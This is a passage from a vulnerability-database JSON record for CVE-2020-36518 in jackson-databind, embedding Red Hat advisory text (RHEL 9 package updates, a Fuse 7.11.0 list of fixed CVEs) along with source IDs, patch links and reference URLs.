update for jackson-annotations, jackson-core, jackson-databind,\njackson-jaxrs-providers, and jackson-modules-base is now available for Red\nHat Enterprise Linux 9. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux AppStream (v. 9) - noarch\n\n3. Description:\n\nJackson is a suite of data-processing tools for Java, including the\nflagship streaming JSON parser / generator library, matching data-binding\nlibrary, and additional modules to process data encoded in various other\ndata formats. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 9.2 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Package List:\n\nRed Hat Enterprise Linux AppStream (v. 9):\n\nSource:\njackson-annotations-2.14.1-1.el9.src.rpm\njackson-core-2.14.1-2.el9.src.rpm\njackson-databind-2.14.1-2.el9.src.rpm\njackson-jaxrs-providers-2.14.1-2.el9.src.rpm\njackson-modules-base-2.14.1-2.el9.src.rpm\n\nnoarch:\npki-jackson-annotations-2.14.1-1.el9.noarch.rpm\npki-jackson-core-2.14.1-2.el9.noarch.rpm\npki-jackson-databind-2.14.1-2.el9.noarch.rpm\npki-jackson-jaxrs-json-provider-2.14.1-2.el9.noarch.rpm\npki-jackson-jaxrs-providers-2.14.1-2.el9.noarch.rpm\npki-jackson-module-jaxb-annotations-2.14.1-2.el9.noarch.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2020-36518\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.2_release_notes/index\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2023 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBZFo1ONzjgjWX9erEAQhQXA//RhJAsKLGfyB+T7HQRwsWYj9OoKCzMCkc\nScXoI5eI1LYKZijOPfLHj63Zp/DO+pAJLCaHdb+S+OKRddCSsHRQPw4x0tBWNPPW\nFBcrbxITZEbyW3WWe7BSE9/HK0ckojEJIaxmBYTsRc8zErXMmPLKGAwODWC0ohjs\n8RGmfV5Cj8OzhprS0MWKrbydlv/kUzr/vayM870hRGIwg1+vE3owWYLGN8ZAwqcs\n3J/N3OMheZiUk3MxPCkk92sJmpuEmGQrPPL2+I5/lXMRo4SEq3sairxkAwER10i1\nkXxF8aFwgHYv5oaD06B+PuIFEQ26Clc97oMMbYBEFDYVGa5pIPNZ0dG16QPO9HLT\nCo0oFQ/y77HrzmM5FCUI6Zlgt8fccvc2Cg4VGG473zTAkQ0JvsZtbIjH4PVfoMp8\n5Rrvk2YZJCTKdjB+7RkgnTZBQ8Xar1XwMBTQ1Zq6Z1b+ERTc8s+ihIOjD86cd+J7\nTLPf/fDiy6arGI13lCa81Ssyg2iWOzySHUEag0Fs1eYKWMSoKMuSuywH7e0hjFKG\n+AqSml6lTxNvwGZ13ieMGslOGRFk01GR6R2BbwnDicXXhqv1O2kuaDenf9HQBteR\nKsTKBi7dBqdoHwGBpVb8gRxntlKQQKsKv1wpA+A2yDFu4umBxcUoZ9fT2WnI12UH\ncvdlmKHSc9E=W5RJ\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. The purpose of this text-only errata is to inform you about the\nsecurity issues fixed in this release. \n\nInstallation instructions are available from the Fuse 7.11.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.11/\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1838332 - CVE-2020-9484 tomcat: deserialization flaw in session persistence storage leading to RCE\n1887810 - CVE-2020-15250 junit4: TemporaryFolder is shared between all users across system which could result in information disclosure\n1893070 - CVE-2020-25689 wildfly-core: memory leak in WildFly host-controller in domain mode while not able to reconnect to domain-controller\n1893125 - CVE-2020-7020 elasticsearch: not properly preserving security permissions when executing complex queries may lead to information disclosure\n1917209 - CVE-2021-24122 tomcat: Information disclosure when using NTFS file system\n1930291 - CVE-2020-29582 kotlin: vulnerable Java API was used for temporary file and folder creation which could result in information disclosure\n1934032 - CVE-2021-25122 tomcat: Request mix-up with h2c\n1934061 - CVE-2021-25329 tomcat: Incomplete fix for CVE-2020-9484 (RCE via session persistence)\n1966735 - CVE-2021-29505 XStream: remote command execution attack by manipulating the processed input stream\n1973413 - CVE-2021-33813 jdom: XXE allows attackers to cause a DoS via a crafted HTTP request\n1976052 - CVE-2021-3644 wildfly-core: Invalid Sensitivity Classification of Vault Expression\n1977064 - CVE-2021-22119 spring-security: Denial-of-Service (DoS) attack via initiation of Authorization Request\n1977362 - CVE-2021-3629 undertow: potential security issue in flow control over HTTP/2 may lead to DOS\n1981407 - CVE-2021-3642 wildfly-elytron: possible timing attack in ScramServer\n1981533 - CVE-2021-33037 tomcat: HTTP request smuggling when used with a reverse proxy\n1981544 - CVE-2021-30640 tomcat: JNDI realm authentication weakness\n1981895 - CVE-2021-35515 apache-commons-compress: infinite loop when reading a specially crafted 7Z archive\n1981900 - CVE-2021-35516 apache-commons-compress: excessive memory allocation when reading a specially crafted 7Z archive\n1981903 - CVE-2021-35517 apache-commons-compress: excessive memory allocation when reading a specially crafted TAR archive\n1981909 - CVE-2021-36090 apache-commons-compress: excessive memory allocation when reading a specially crafted ZIP archive\n2004820 - CVE-2021-41079 tomcat: Infinite loop while reading an unexpected TLS packet when using OpenSSL JSSE engine\n2007557 - CVE-2021-3807 nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes\n2009041 - CVE-2021-38153 Kafka: Timing Attack Vulnerability for Apache Kafka Connect and Clients\n2010378 - CVE-2021-3859 undertow: client side invocation timeout raised when calling over HTTP2\n2011190 - CVE-2021-40690 xml-security: XPath Transform abuse allows for information disclosure\n2014356 - CVE-2021-42340 tomcat: OutOfMemoryError caused by HTTP upgrade connection leak could lead to DoS\n2020583 - CVE-2021-2471 mysql-connector-java: unauthorized access to critical\n2031958 - CVE-2021-43797 netty: control chars in header names may lead to HTTP request smuggling\n2033560 - CVE-2021-42550 logback: remote code execution through JNDI call from within its configuration file\n2034388 - CVE-2021-4178 kubernetes-client: Insecure deserialization in unmarshalYaml method\n2034584 - CVE-2021-22096 springframework: malicious input leads to insertion of additional log entries\n2039903 - CVE-2021-22569 protobuf-java: potential DoS in the parsing procedure for binary data\n2044596 - CVE-2022-23221 h2: Loading of custom classes from remote servers through JNDI\n2046279 - CVE-2022-22932 karaf: path traversal flaws\n2046282 - CVE-2021-41766 karaf: insecure java deserialization\n2047343 - CVE-2022-21363 mysql-connector-java: Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors\n2047417 - CVE-2022-23181 tomcat: local privilege escalation vulnerability\n2049778 - CVE-2022-23596 junrar: A carefully crafted RAR archive can trigger an infinite loop while extracting\n2049783 - CVE-2021-43859 xstream: Injecting highly recursive collections or maps can cause a DoS\n2050863 - CVE-2022-21724 jdbc-postgresql: Unchecked Class Instantiation when providing Plugin Classes\n2055480 - CVE-2021-22060 springframework: Additional Log Injection in Spring Framework (follow-up to CVE-2021-22096)\n2058763 - CVE-2022-24614 metadata-extractor: Out-of-memory when reading a specially crafted JPEG file\n2063292 - CVE-2022-26336 poi-scratchpad: A carefully crafted TNEF file can cause an out of memory exception\n2063601 - CVE-2022-23913 artemis-commons: Apache ActiveMQ Artemis DoS\n2064007 - CVE-2022-26520 postgresql-jdbc: Arbitrary File Write Vulnerability\n2064226 - CVE-2022-0084 xnio: org.xnio.StreamConnection.notifyReadClosed log to debug instead of stderr\n2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects\n2069414 - CVE-2022-22950 spring-expression: Denial of service via specially crafted SpEL expression\n2072339 - CVE-2022-1259 undertow: potential security issue in flow control over HTTP/2 may lead to DOS(incomplete fix for CVE-2021-3629)\n2073890 - CVE-2022-1319 undertow: Double AJP response for 400 from EAP 7 results in CPING failures\n2075441 - CVE-2022-22968 Spring Framework: Data Binding Rules Vulnerability\n2081879 - CVE-2021-22573 google-oauth-client: Token signature not verified\n2087214 - CVE-2022-22976 springframework: BCrypt skips salt rounds for work factor of 31\n2087272 - CVE-2022-22970 springframework: DoS via data binding to multipartFile or servlet part\n2087274 - CVE-2022-22971 springframework: DoS with STOMP over WebSocket\n2087606 - CVE-2022-22978 springframework: Authorization Bypass in RegexRequestMatcher\n2088523 - CVE-2022-30126 tika-core: Regular Expression Denial of Service in standards extractor\n2100654 - CVE-2022-25845 fastjson: autoType shutdown restriction bypass leads to deserialization\n\n5",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-36518"
},
{
"db": "VULHUB",
"id": "VHN-415522"
},
{
"db": "VULMON",
"id": "CVE-2020-36518"
},
{
"db": "PACKETSTORM",
"id": "168621"
},
{
"db": "PACKETSTORM",
"id": "178714"
},
{
"db": "PACKETSTORM",
"id": "169729"
},
{
"db": "PACKETSTORM",
"id": "169727"
},
{
"db": "PACKETSTORM",
"id": "170162"
},
{
"db": "PACKETSTORM",
"id": "172453"
},
{
"db": "PACKETSTORM",
"id": "172220"
},
{
"db": "PACKETSTORM",
"id": "167841"
}
],
"trust": 1.8
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-415522",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-415522"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2020-36518",
"trust": 2.0
},
{
"db": "PACKETSTORM",
"id": "167841",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170162",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "169727",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "169729",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "168646",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169920",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170179",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169728",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170602",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168333",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167842",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169725",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167579",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167157",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169926",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167422",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168631",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167423",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167523",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167424",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-415522",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2020-36518",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168621",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "178714",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "172453",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "172220",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-415522"
},
{
"db": "VULMON",
"id": "CVE-2020-36518"
},
{
"db": "PACKETSTORM",
"id": "168621"
},
{
"db": "PACKETSTORM",
"id": "178714"
},
{
"db": "PACKETSTORM",
"id": "169729"
},
{
"db": "PACKETSTORM",
"id": "169727"
},
{
"db": "PACKETSTORM",
"id": "170162"
},
{
"db": "PACKETSTORM",
"id": "172453"
},
{
"db": "PACKETSTORM",
"id": "172220"
},
{
"db": "PACKETSTORM",
"id": "167841"
},
{
"db": "NVD",
"id": "CVE-2020-36518"
}
]
},
"id": "VAR-202203-1400",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-415522"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T20:12:11.843000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Debian CVElist Bug Report Logs: jackson-databind: CVE-2020-36518 - denial of service via a large depth of nested objects",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=132bfb560fdb3ea50d04b86a97510e72"
},
{
"title": "Red Hat: Moderate: Red Hat build of Quarkus 2.7.6 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225596 - Security Advisory"
},
{
"title": "Red Hat: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2020-36518"
},
{
"title": "Red Hat: Moderate: Red Hat build of Eclipse Vert.x 4.2.7 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225029 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Data Grid 8.3.1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222232 - Security Advisory"
},
{
"title": "Debian Security Advisories: DSA-5283-1 jackson-databind -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=8b2d72a88883004db1af36b2a5555ec5"
},
{
"title": "Red Hat: Moderate: Red Hat Single Sign-On 7.6.1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20227417 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Single Sign-On 7.6.1 security update on RHEL 7",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20227409 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Single Sign-On 7.6.1 security update on RHEL 8",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20227410 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat AMQ Broker 7.10.0 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225101 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Single Sign-On 7.6.1 security update on RHEL 9",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20227411 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Single Sign-On 7.5.3 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226787 - Security Advisory"
},
{
"title": "Hitachi Security Advisories: DoS Vulnerability in Hitachi Automation Director and Hitachi Ops Center Automator",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2022-124"
},
{
"title": "Red Hat: Moderate: Red Hat JBoss Enterprise Application Platform 7.4.5 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224922 - Security Advisory"
},
{
"title": "IBM: Security Bulletin: IBM Security Guardium is affected by multiple vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=b6d4a9a2291746180c38fbf6a3fb24c9"
},
{
"title": "Red Hat: Moderate: Red Hat JBoss Enterprise Application Platform 7.4.5 security update on RHEL 8",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224919 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat JBoss Enterprise Application Platform 7.4.5 security update on RHEL 7",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224918 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Integration Camel-K 1.8 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226407 - Security Advisory"
},
{
"title": "IBM: Security Bulletin: IBM Security Guardium is affected by multiple vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=4270c81d57277abf34c4e93520a9049b"
},
{
"title": "IBM: Security Bulletin: IBM Security Guardium is affected by multiple vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=6443b20792fe5a117fa89ee8dde3daaf"
},
{
"title": "Hitachi Security Advisories: Vulnerability in Cosminexus",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2022-120"
},
{
"title": "Red Hat: Moderate: Logging Subsystem 5.4.8 - Red Hat OpenShift security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20227435 - Security Advisory"
},
{
"title": "Hitachi Security Advisories: Multiple Vulnerabilities in Hitachi Ops Center Common Services",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2022-125"
},
{
"title": "Red Hat: Important: Red Hat Fuse 7.11.0 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225532 - Security Advisory"
},
{
"title": "IBM: Security Bulletin: Multiple security vulnerabilities are addressed with IBM Business Automation Manager Open Editions 8.0.1",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=ac267c598ae2a2882a98ed5463cc028d"
},
{
"title": "Red Hat: Moderate: Openshift Logging 5.3.14 bug fix release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228889 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Logging Subsystem 5.5.5 - Red Hat OpenShift security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228781 - Security Advisory"
},
{
"title": "IBM: Security Bulletin: z/Transaction Processing Facility is affected by multiple vulnerabilities in the jackson-databind, jackson-dataformat-xml, jackson-core, slf4j-ext, and cxf-core packages",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=f974282a27702bae4111bf7716ee6cf6"
},
{
"title": "IBM: Security Bulletin: Multiple vulnerabilities in Data-Binding for Jackson shipped with IBM Operations Analytics \u2013 Log Analysis",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=1db4c8cb14383c63d0c04205c943ef8a"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/viesti/timbre-json-appender "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/Azure/kafka-sink-azure-kusto "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/seriouszyx/seriouszyx "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/jeremybrooks/jinx "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-36518"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-787",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-415522"
},
{
"db": "NVD",
"id": "CVE-2020-36518"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.3,
"url": "https://www.debian.org/security/2022/dsa-5283"
},
{
"trust": 1.2,
"url": "https://security.netapp.com/advisory/ntap-20220506-0004/"
},
{
"trust": 1.2,
"url": "https://github.com/fasterxml/jackson-databind/issues/2816"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.2,
"url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00001.html"
},
{
"trust": 1.2,
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00035.html"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2020-36518"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36518"
},
{
"trust": 0.7,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.7,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-0084"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-43797"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0225"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2668"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0084"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-0866"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-2668"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-0225"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-42392"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0866"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-43797"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-42392"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-42003"
},
{
"trust": 0.2,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-42004"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/787.html"
},
{
"trust": 0.1,
"url": "https://github.com/viesti/timbre-json-appender"
},
{
"trust": 0.1,
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1007109"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2256"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6783"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2256"
},
{
"trust": 0.1,
"url": "https://issues.redhat.com/browse/rhel-19140"
},
{
"trust": 0.1,
"url": "https://issues.redhat.com/browse/rhel-12764"
},
{
"trust": 0.1,
"url": "https://issues.redhat.com/browse/rhel-16724"
},
{
"trust": 0.1,
"url": "https://issues.redhat.com/browse/rhel-22445"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2024:3061"
},
{
"trust": 0.1,
"url": "https://issues.redhat.com/browse/rhel-12765"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.10_release_notes/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3061.json"
},
{
"trust": 0.1,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2064698"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:7410"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.rhsso\u0026downloadtype=securitypatches\u0026version=7.6"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:7417"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22844"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28390"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30002"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27406"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21619"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24448"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27950"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3640"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2068"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2097"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36558"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0168"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0854"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-20368"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0617"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0865"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0562"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2586"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35525"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:8781"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25255"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-41715"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26717"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21624"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0168"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-3709"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30002"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0865"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22628"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36516"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1016"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28893"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0854"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1304"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3640"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21618"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2509"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-3709"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2879"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22624"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26716"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1927"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2078"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27405"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0891"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0617"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.11/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21626"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-39399"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1852"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-36946"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0562"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26709"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3515"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-37434"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1055"
},
{
"trust": 0.1,
